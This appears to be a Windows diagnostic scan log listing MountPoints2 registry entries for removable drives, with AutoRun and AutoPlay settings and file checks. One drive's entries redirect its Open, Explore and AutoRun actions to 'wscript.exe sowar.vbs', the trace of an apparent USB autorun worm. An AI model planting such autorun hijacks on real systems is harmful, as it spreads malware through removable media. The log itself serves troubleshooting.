*MultiFile Done* -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0822e657-f650-11dc-8d6b-00038a000015}\shell\Autoplay\DropTarget\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0822e657-f650-11dc-8d6b-00038a000015}\shell\Autoplay\DropTarget\\CLSID -> {f26a669a-bcbb-4e37-abf9-7325da15f931} -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9162-f691-11dc-8d6c-00038a000015}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9162-f691-11dc-8d6c-00038a000015}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9162-f691-11dc-8d6c-00038a000015}\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F DF 5F 5F 5F 5F DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F DF 5F 5F 5F 5F 5F 00 5F 5F 5F 5F 5F CF CF 5F 5F 5F 5F 01 01 00 EE FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 00 10 00 00 08 02 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9162-f691-11dc-8d6c-00038a000015}\shell\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9162-f691-11dc-8d6c-00038a000015}\shell\\ -> None -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9162-f691-11dc-8d6c-00038a000015}\shell\Autoplay\ -> -> 
*MUIVerb* -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9162-f691-11dc-8d6c-00038a000015}\shell\Autoplay\\MUIVerb -> 
@shell32.dll -> %SystemRoot%\system32\shell32.dll -> Microsoft Corporation [Ver = 6.00.2900.5512 (xpsp.080413-2105) | Size = 8461312 bytes | Modified Date = 4/13/2008 5:12:05 PM | Attr =    ]
-8504 ->  -> File not found
*MultiFile Done* -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9162-f691-11dc-8d6c-00038a000015}\shell\Autoplay\DropTarget\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9162-f691-11dc-8d6c-00038a000015}\shell\Autoplay\DropTarget\\CLSID -> {f26a669a-bcbb-4e37-abf9-7325da15f931} -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9163-f691-11dc-8d6c-00038a000015}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9163-f691-11dc-8d6c-00038a000015}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9163-f691-11dc-8d6c-00038a000015}\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F DF 5F 5F 5F 5F DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F DF 5F 5F 5F 5F 5F CF 5F 5F 5F 5F 5F CF CF 5F 5F 5F 5F CF CF CF CF CF CF CF CF 5F CF CF CF 5F 5F 5F 5F 5F 5F 5F 5F 5F 5F 00 00 10 00 00 00 00 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9163-f691-11dc-8d6c-00038a000015}\shell\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9163-f691-11dc-8d6c-00038a000015}\shell\\ -> None -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9163-f691-11dc-8d6c-00038a000015}\shell\Autoplay\ -> -> 
*MUIVerb* -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9163-f691-11dc-8d6c-00038a000015}\shell\Autoplay\\MUIVerb -> 
@shell32.dll -> %SystemRoot%\system32\shell32.dll -> Microsoft Corporation [Ver = 6.00.2900.5512 (xpsp.080413-2105) | Size = 8461312 bytes | Modified Date = 4/13/2008 5:12:05 PM | Attr =    ]
-8504 ->  -> File not found
*MultiFile Done* -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9163-f691-11dc-8d6c-00038a000015}\shell\Autoplay\DropTarget\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9163-f691-11dc-8d6c-00038a000015}\shell\Autoplay\DropTarget\\CLSID -> {f26a669a-bcbb-4e37-abf9-7325da15f931} -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9164-f691-11dc-8d6c-00038a000015}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9164-f691-11dc-8d6c-00038a000015}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9164-f691-11dc-8d6c-00038a000015}\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F DF 5F 5F 5F 5F DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F DF 5F 5F 5F 5F 5F CF 5F 5F 5F 5F 5F CF CF 5F 5F 5F 5F CF CF CF CF CF CF CF CF 5F CF CF CF 5F 5F 5F 5F 5F 5F 5F 5F 5F 5F 00 00 10 00 00 00 00 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9164-f691-11dc-8d6c-00038a000015}\shell\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9164-f691-11dc-8d6c-00038a000015}\shell\\ -> None -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9164-f691-11dc-8d6c-00038a000015}\shell\Autoplay\ -> -> 
*MUIVerb* -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9164-f691-11dc-8d6c-00038a000015}\shell\Autoplay\\MUIVerb -> 
@shell32.dll -> %SystemRoot%\system32\shell32.dll -> Microsoft Corporation [Ver = 6.00.2900.5512 (xpsp.080413-2105) | Size = 8461312 bytes | Modified Date = 4/13/2008 5:12:05 PM | Attr =    ]
-8504 ->  -> File not found
*MultiFile Done* -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9164-f691-11dc-8d6c-00038a000015}\shell\Autoplay\DropTarget\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9164-f691-11dc-8d6c-00038a000015}\shell\Autoplay\DropTarget\\CLSID -> {f26a669a-bcbb-4e37-abf9-7325da15f931} -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9165-f691-11dc-8d6c-00038a000015}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9165-f691-11dc-8d6c-00038a000015}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9165-f691-11dc-8d6c-00038a000015}\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F DF 5F 5F 5F 5F DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F DF 5F 5F 5F 5F 5F CF 5F 5F 5F 5F 5F CF CF 5F 5F 5F 5F CF CF CF CF CF CF CF CF 5F CF CF CF 5F 5F 5F 5F 5F 5F 5F 5F 5F 5F 00 00 10 00 00 00 00 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9165-f691-11dc-8d6c-00038a000015}\shell\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9165-f691-11dc-8d6c-00038a000015}\shell\\ -> None -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9165-f691-11dc-8d6c-00038a000015}\shell\Autoplay\ -> -> 
*MUIVerb* -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9165-f691-11dc-8d6c-00038a000015}\shell\Autoplay\\MUIVerb -> 
@shell32.dll -> %SystemRoot%\system32\shell32.dll -> Microsoft Corporation [Ver = 6.00.2900.5512 (xpsp.080413-2105) | Size = 8461312 bytes | Modified Date = 4/13/2008 5:12:05 PM | Attr =    ]
-8504 ->  -> File not found
*MultiFile Done* -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9165-f691-11dc-8d6c-00038a000015}\shell\Autoplay\DropTarget\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{083e9165-f691-11dc-8d6c-00038a000015}\shell\Autoplay\DropTarget\\CLSID -> {f26a669a-bcbb-4e37-abf9-7325da15f931} -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{08f68d2d-6bec-11dd-8de3-00038a000015}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{08f68d2d-6bec-11dd-8de3-00038a000015}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{08f68d2d-6bec-11dd-8de3-00038a000015}\\_AutorunStatus -> 01 01 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 01 00 00 00 09 00 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{08f9ae04-6256-11dc-8d20-00038a000015}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{08f9ae04-6256-11dc-8d20-00038a000015}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{08f9ae04-6256-11dc-8d20-00038a000015}\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F DF 5F 5F 5F 5F DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F DF 5F 5F 5F 5F 5F 01 00 01 01 EE FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 00 10 00 00 09 02 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{08f9ae04-6256-11dc-8d20-00038a000015}\Shell\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{08f9ae04-6256-11dc-8d20-00038a000015}\Shell\\ -> Open -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{08f9ae04-6256-11dc-8d20-00038a000015}\Shell\AutoPlay\ -> -> 
*MUIVerb* -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{08f9ae04-6256-11dc-8d20-00038a000015}\Shell\AutoPlay\\MUIVerb -> 
@shell32.dll -> %SystemRoot%\system32\shell32.dll -> Microsoft Corporation [Ver = 6.00.2900.5512 (xpsp.080413-2105) | Size = 8461312 bytes | Modified Date = 4/13/2008 5:12:05 PM | Attr =    ]
-8504 ->  -> File not found
*MultiFile Done* -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{08f9ae04-6256-11dc-8d20-00038a000015}\Shell\AutoPlay\Command\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{08f9ae04-6256-11dc-8d20-00038a000015}\Shell\AutoPlay\Command\\ -> wscript.exe sowar.vbs -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{08f9ae04-6256-11dc-8d20-00038a000015}\Shell\AutoPlay\DropTarget\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{08f9ae04-6256-11dc-8d20-00038a000015}\Shell\AutoPlay\DropTarget\\CLSID -> {f26a669a-bcbb-4e37-abf9-7325da15f931} -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{08f9ae04-6256-11dc-8d20-00038a000015}\Shell\AutoRun\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{08f9ae04-6256-11dc-8d20-00038a000015}\Shell\AutoRun\\Extended ->  -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{08f9ae04-6256-11dc-8d20-00038a000015}\Shell\AutoRun\command\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{08f9ae04-6256-11dc-8d20-00038a000015}\Shell\AutoRun\command\\ -> wscript.exe sowar.vbs -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{08f9ae04-6256-11dc-8d20-00038a000015}\Shell\Explore\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{08f9ae04-6256-11dc-8d20-00038a000015}\Shell\Explore\Command\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{08f9ae04-6256-11dc-8d20-00038a000015}\Shell\Explore\Command\\ -> wscript.exe sowar.vbs -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{08f9ae04-6256-11dc-8d20-00038a000015}\Shell\Open\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{08f9ae04-6256-11dc-8d20-00038a000015}\Shell\Open\Command\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{08f9ae04-6256-11dc-8d20-00038a000015}\Shell\Open\Command\\ -> wscript.exe sowar.vbs -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{08f9ae04-6256-11dc-8d20-00038a000015}\Shell\Open\Default\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{08f9ae04-6256-11dc-8d20-00038a000015}\Shell\Open\Default\\ -> 1 -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{2b3a3cd2-8889-11dc-8d3b-00038a000015}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{2b3a3cd2-8889-11dc-8d3b-00038a000015}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{2b3a3cd2-8889-11dc-8d3b-00038a000015}\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F DF 5F 5F 5F 5F DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F DF 5F 5F 5F 5F 5F 00 5F 5F 5F 5F 5F CF CF 5F 5F 5F 5F 01 01 00 EE FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 00 10 00 00 08 02 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{361ac05c-0e0d-11da-9aa9-806d6172696f}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{361ac05c-0e0d-11da-9aa9-806d6172696f}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{361ac05d-0e0d-11da-9aa9-806d6172696f}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{361ac05d-0e0d-11da-9aa9-806d6172696f}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{361ac05d-0e0d-11da-9aa9-806d6172696f}\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F 01 00 01 01 EE FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 20 00 00 00 09 00 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{361ac05d-0e0d-11da-9aa9-806d6172696f}\Shell\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{361ac05d-0e0d-11da-9aa9-806d6172696f}\Shell\\ -> AutoRun -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{361ac05d-0e0d-11da-9aa9-806d6172696f}\Shell\AutoRun\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{361ac05d-0e0d-11da-9aa9-806d6172696f}\Shell\AutoRun\\ -> Auto&Play -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{361ac05d-0e0d-11da-9aa9-806d6172696f}\Shell\AutoRun\command\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{361ac05d-0e0d-11da-9aa9-806d6172696f}\Shell\AutoRun\command\\ -> E:\setup.exe [E:\setup.exe] -> File not found
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{361ac05d-0e0d-11da-9aa9-806d6172696f}\_Autorun\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{361ac05d-0e0d-11da-9aa9-806d6172696f}\_Autorun\DefaultIcon\ -> -> 
*~EmptyValue* -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{361ac05d-0e0d-11da-9aa9-806d6172696f}\_Autorun\DefaultIcon\\ -> 
E:\setup.exe -> E:\setup.exe -> File not found
0 ->  -> File not found
*MultiFile Done* -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{361ac05e-0e0d-11da-9aa9-806d6172696f}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{361ac05e-0e0d-11da-9aa9-806d6172696f}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{361ac05f-0e0d-11da-9aa9-806d6172696f}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{361ac05f-0e0d-11da-9aa9-806d6172696f}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{469152aa-dd6d-11dc-8d5d-00038a000015}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{469152aa-dd6d-11dc-8d5d-00038a000015}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{469152aa-dd6d-11dc-8d5d-00038a000015}\\_AutorunStatus -> 01 01 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 20 00 00 00 09 00 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{469152aa-dd6d-11dc-8d5d-00038a000015}\_Autorun\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{469152aa-dd6d-11dc-8d5d-00038a000015}\_Autorun\DefaultIcon\ -> -> 
*~EmptyValue* -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{469152aa-dd6d-11dc-8d5d-00038a000015}\_Autorun\DefaultIcon\\ -> 
E:\LaunchU3.exe -> E:\LaunchU3.exe ->  [Ver = 1, 4, 0, 7 | Size = 1110016 bytes | Modified Date = 2/12/2007 6:33:37 PM | Attr = R  ]
0 ->  -> File not found
*MultiFile Done* -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{469152ab-dd6d-11dc-8d5d-00038a000015}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{469152ab-dd6d-11dc-8d5d-00038a000015}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{469152ab-dd6d-11dc-8d5d-00038a000015}\\_AutorunStatus -> 01 01 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 00 10 00 00 08 00 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{608c55a2-7f19-11db-9a21-806d6172696f}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{608c55a2-7f19-11db-9a21-806d6172696f}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{608c55a3-7f19-11db-9a21-806d6172696f}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{608c55a3-7f19-11db-9a21-806d6172696f}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{86523382-9328-11dc-8d41-00038a000015}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{86523382-9328-11dc-8d41-00038a000015}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{86523382-9328-11dc-8d41-00038a000015}\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F DF 5F 5F 5F 5F DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F DF 5F 5F 5F 5F 5F 00 5F 5F 5F 5F 5F CF CF 5F 5F 5F 5F 01 01 00 EE FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 00 10 00 00 08 02 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de30-2831-11dc-8cfa-00038a000015}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de30-2831-11dc-8cfa-00038a000015}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de30-2831-11dc-8cfa-00038a000015}\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F 01 00 01 01 EE FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 20 00 00 00 09 00 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de30-2831-11dc-8cfa-00038a000015}\Shell\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de30-2831-11dc-8cfa-00038a000015}\Shell\\ -> AutoRun -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de30-2831-11dc-8cfa-00038a000015}\Shell\AutoRun\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de30-2831-11dc-8cfa-00038a000015}\Shell\AutoRun\\ -> Auto&Play -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de30-2831-11dc-8cfa-00038a000015}\Shell\AutoRun\command\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de30-2831-11dc-8cfa-00038a000015}\Shell\AutoRun\command\\ -> I:\LaunchU3.exe [I:\LaunchU3.exe -a] -> File not found
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de30-2831-11dc-8cfa-00038a000015}\_Autorun\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de30-2831-11dc-8cfa-00038a000015}\_Autorun\DefaultIcon\ -> -> 
*~EmptyValue* -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de30-2831-11dc-8cfa-00038a000015}\_Autorun\DefaultIcon\\ -> 
I:\LaunchU3.exe -> I:\LaunchU3.exe -> File not found
0 ->  -> File not found
*MultiFile Done* -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de31-2831-11dc-8cfa-00038a000015}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de31-2831-11dc-8cfa-00038a000015}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de31-2831-11dc-8cfa-00038a000015}\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F DF 5F 5F 5F 5F DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F DF 5F 5F 5F 5F 5F CF 5F 5F 5F 5F 5F CF CF 5F 5F 5F 5F CF CF CF CF CF 01 00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 00 10 00 00 08 00 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de31-2831-11dc-8cfa-00038a000015}\Shell\ -> -> 
